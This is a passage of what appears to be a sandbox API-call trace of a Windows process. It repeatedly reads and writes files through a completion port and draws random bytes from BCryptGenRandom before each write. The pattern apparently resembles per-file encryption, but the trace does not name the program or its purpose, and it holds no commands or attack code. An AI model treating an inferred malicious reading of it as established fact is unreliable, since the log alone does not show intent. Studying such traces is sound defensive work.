lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.184] CloseHandle (hObject=0x2a8) returned 1 [0203.184] free (_Block=0x3df0008) [0203.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.191] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.191] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.191] free (_Block=0x3e305b8) [0203.191] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.191] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.191] free (_Block=0x1fa91d0) [0203.191] free (_Block=0x1fa2ed8) [0203.191] free (_Block=0x1fa90b8) [0203.191] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.192] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.200] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.201] CloseHandle (hObject=0x2a8) returned 1 [0203.201] free (_Block=0x3df0008) [0203.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.207] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.207] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.207] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.207] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.208] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.208] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.208] free (_Block=0x3e305b8) [0203.208] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.208] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.208] free (_Block=0x1fa91d0) [0203.208] free (_Block=0x1fa2ed8) [0203.208] free (_Block=0x1fa90b8) [0203.208] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.209] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.209] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.217] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.217] CloseHandle (hObject=0x2a8) returned 1 [0203.217] free (_Block=0x3df0008) [0203.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.225] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.225] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.225] free (_Block=0x3e305b8) [0203.225] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.225] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.225] free (_Block=0x1fa91d0) [0203.225] free (_Block=0x1fa2ed8) [0203.225] free (_Block=0x1fa90b8) [0203.226] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.226] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.235] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.235] CloseHandle (hObject=0x2a8) returned 1 [0203.235] free (_Block=0x3df0008) [0203.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.242] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.243] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.243] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.243] free (_Block=0x3e305b8) [0203.243] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.243] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.243] free (_Block=0x1fa91d0) [0203.243] free (_Block=0x1fa2ed8) [0203.243] free (_Block=0x1fa90b8) [0203.243] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.244] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.252] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.252] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.253] CloseHandle (hObject=0x2a8) returned 1 [0203.253] free (_Block=0x3df0008) [0203.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.261] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.262] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.262] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.262] free (_Block=0x3e305b8) [0203.262] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.262] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.262] free (_Block=0x1fa91d0) [0203.262] free (_Block=0x1fa2ed8) [0203.262] free (_Block=0x1fa90b8) [0203.262] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.262] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.263] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.271] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.271] CloseHandle (hObject=0x2a8) returned 1 [0203.271] free (_Block=0x3df0008) [0203.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.280] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.280] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.280] free (_Block=0x3e305b8) [0203.280] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.280] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.280] free (_Block=0x1fa91d0) [0203.280] free (_Block=0x1fa2ed8) [0203.280] free (_Block=0x1fa90b8) [0203.280] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.281] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.289] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.289] CloseHandle (hObject=0x2a8) returned 1 [0203.289] free (_Block=0x3df0008) [0203.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.297] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.297] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.297] free (_Block=0x3e305b8) [0203.297] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.297] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.297] free (_Block=0x1fa91d0) [0203.298] free (_Block=0x1fa2ed8) [0203.298] free (_Block=0x1fa90b8) [0203.298] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.298] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.307] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xad, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.307] CloseHandle (hObject=0x2a8) returned 1 [0203.307] free (_Block=0x3df0008) [0203.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.314] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.314] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.314] free (_Block=0x3e305b8) [0203.314] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.314] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.314] free (_Block=0x1fa91d0) [0203.314] free (_Block=0x1fa2ed8) [0203.314] free (_Block=0x1fa90b8) [0203.314] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.315] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.323] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.323] CloseHandle (hObject=0x2a8) returned 1 [0203.324] free (_Block=0x3df0008) [0203.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.330] 